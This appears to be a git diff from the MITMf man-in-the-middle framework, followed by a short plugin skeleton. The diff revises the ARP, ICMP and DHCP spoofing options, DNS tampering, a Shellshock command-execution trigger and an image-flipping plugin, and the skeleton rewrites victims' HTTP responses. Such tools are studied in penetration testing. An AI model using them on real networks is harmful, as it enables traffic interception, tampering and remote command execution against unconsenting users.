help='Proxy/Modify DNS queries') - options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') - options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') - options.add_argument('--target', dest='target', default=None, help='Specify a host to poison [default: subnet]') - options.add_argument('--arpmode',type=str, dest='arpmode', default='req', choices=["req", "rep"], help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]') - #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') + SystemConfig.setIpForwarding(1) - def finish(self): - for protocol in self.protocolInstances: - if hasattr(protocol, 'stop'): - protocol.stop() + if not options.manualiptables: + IpTables.getInstance().Flush() + if IpTables.getInstance().http is False: + IpTables.getInstance().HTTP(options.listen) - if not self.manualiptables: - IpTables.getInstance().Flush() + for protocol in self.protocolInstances: + protocol.start() - SystemConfig.setIpForwarding(0) + def add_options(self, options): + group = options.add_mutually_exclusive_group(required=False) + group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing') + group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') + group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') + options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries') + options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') + options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') + options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]') + options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') + + def finish(self): + for protocol in self.protocolInstances: + if hasattr(protocol, 'stop'): + protocol.stop() + + if not self.manualiptables: + IpTables.getInstance().Flush() + + SystemConfig.setIpForwarding(0) diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index 959f96c..402c9e5 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -23,8 +23,6 @@ from cStringIO import StringIO from plugins.plugin import Plugin from PIL import Image -mitmf_logger = logging.getLogger('mitmf') - class Upsidedownternet(Plugin): name = "Upsidedownternet" optname = "upsidedownternet" @@ -65,7 +63,7 @@ class Upsidedownternet(Plugin): im.save(output, format=image_type) data = output.getvalue() output.close() - mitmf_logger.info("%s Flipped image" % request.client.getClientIP()) + mitmf_logger.info("{} Flipped image".format(request.client.getClientIP())) except Exception as e: - mitmf_logger.info("%s Error: %s" % (request.client.getClientIP(), e)) + mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e)) return {'request': request, 'data': data} diff --git a/plugins/__init__.py b/plugins/__init__.py index 
5026fd4..155e900 100644 --- a/plugins/__init__.py +++ b/plugins/__init__.py @@ -3,4 +3,3 @@ import os import glob __all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")] - diff --git a/plugins/plugin.py b/plugins/plugin.py index b73486d..9befa33 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -2,9 +2,12 @@ The base plugin class. This shows the various methods that can get called during the MITM attack. ''' +from core.configwatcher import ConfigWatcher +import logging +mitmf_logger = logging.getLogger('mitmf') -class Plugin(object): +class Plugin(ConfigWatcher, object): name = "Generic plugin" optname = "generic" desc = "" @@ -15,6 +18,10 @@ class Plugin(object): '''Called if plugin is enabled, passed the options namespace''' self.options = options + def startThread(self, options): '''Anything that overrides this function will be run as a thread''' return + def add_options(options): '''Add your options to the options parser''' raise NotImplementedError @@ -27,6 +34,10 @@ def sendRequest(self, request): '''Handles outgoing request''' raise NotImplementedError + def pluginReactor(self, strippingFactory): '''This sets up another instance of the reactor on a different port''' pass + def handleResponse(self, request, data): ''' Handles all non-image responses by default. See Upsidedownternet diff --git a/requirements.txt b/requirements.txt index aa31339..75fc1ad 100644 --- a/requirements.txt +++ b/requirements.txt @@ -14,5 +14,6 @@ ipy pyopenssl service_identity watchdog +impacket capstone pypcap
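With the base class above now mixing in ConfigWatcher and exposing startThread() and pluginReactor(), the response-rewriting contract itself is unchanged: a plugin implements handleResponse() and returns the request together with the (possibly modified) body, as Upsidedownternet does. A minimal, hedged skeleton under that assumption follows; the class name and the string rewrite are invented, and it only runs inside a MITMf checkout.

```
# Minimal plugin skeleton following the Plugin base class shown above.
# Purely illustrative: the hooks and the {'request': ..., 'data': ...} return
# value follow the convention used by the bundled plugins such as Upsidedownternet.
import logging
from plugins.plugin import Plugin

mitmf_logger = logging.getLogger('mitmf')

class HelloPlugin(Plugin):
    name     = "Hello"
    optname  = "hello"
    desc     = "Example plugin that rewrites response bodies"
    version  = "0.1"
    has_opts = False

    def initialize(self, options):
        '''Called if the plugin is enabled, passed the options namespace'''
        self.options = options

    def handleResponse(self, request, data):
        # Rewrite the response body and hand it back to the proxy
        data = data.replace('Example Domain', 'Hello from MITMf')
        mitmf_logger.info("{} rewrote response".format(request.client.getClientIP()))
        return {'request': request, 'data': data}
```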